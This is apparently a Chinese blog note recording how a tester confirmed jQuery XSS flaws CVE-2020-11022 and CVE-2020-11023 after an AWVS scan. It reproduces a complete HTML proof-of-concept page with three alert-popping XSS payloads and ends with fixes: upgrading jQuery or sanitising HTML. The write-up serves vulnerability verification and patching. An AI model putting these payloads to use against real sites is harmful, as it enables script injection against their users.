AWVS扫出来Vulnerable Javascript library漏洞,然后查询资料,验证漏洞,仅做记录。
参考:
jQuery-XSS漏洞(CVE-2020-11022/CVE-2020-11023)
一开始没看懂怎么操作,后面明白了
payload复制本地保存一份html,然后替换AWVS扫描出来的src,重新网页打开即可验证。
payload:
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)</title>
<script src="js地址"></script>
</head>
<body>
<script>
function test(n,jq){
sanitizedHTML = document.getElementById('poc'+n).innerHTML;
if(jq){
$('#div').html(sanitizedHTML);
}else{
div.innerHTML=sanitizedHTML;
}
}
</script>
<h1>jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)</h1>
<p>PoCs of XSS bugs fixed in <a href="//blog.jquery.com/2020/04/10/jquery-3-5-0-released/">jQuery 3.5.0</a>. You can find the details in my blog post: <a href="//mksben.l0.cm/2020/05/jquery3.5.0-xss.html">English</a> / <a href="//masatokinugawa.l0.cm/2020/05/jquery3.5.0-xss.html">日本語</a></p>
<h2>PoC 1</h2>
<button onclick="test(1)">Assign to innerHTML</button> <button onclick="test(1,true)">Append via .html()</button>
<xmp id="poc1">
<style><style /><img src=x onerror=alert(1)>
</xmp>
<h2>PoC 2 (Only jQuery 3.x affected)</h2>
<button onclick="test(2)">Assign to innerHTML</button> <button onclick="test(2,true)">Append via .html()</button>
<xmp id="poc2">
<img alt="<x" title="/><img src=x onerror=alert(1)>">
</xmp>
<h2>PoC 3</h2>
<button onclick="test(3)">Assign to innerHTML</button> <button onclick="test(3,true)">Append via .html()</button>
<xmp id="poc3">
<option><style></option></select><img src=x onerror=alert(1)></style>
</xmp>
<div id="div"></div>
</body>
</html>
本地文件直接替换src

网页打开,验证,漏洞出现。

修复
(1)更新jQuery到3.5.0或更高版本
https://code.jquery.com/jquery-3.5.0.js
(2)使用XSS清理工具清理用户输入的HTML
本文记录了在安全扫描中发现的Vulnerable Javascript library漏洞,具体为jQuery的XSS漏洞CVE-2020-11022和CVE-2020-11023。通过提供HTML payload,详细解释了如何验证这些漏洞,并给出了两种修复方法:升级到jQuery 3.5.0以上版本或使用XSS清理工具。
7502

被折叠的 条评论
为什么被折叠?



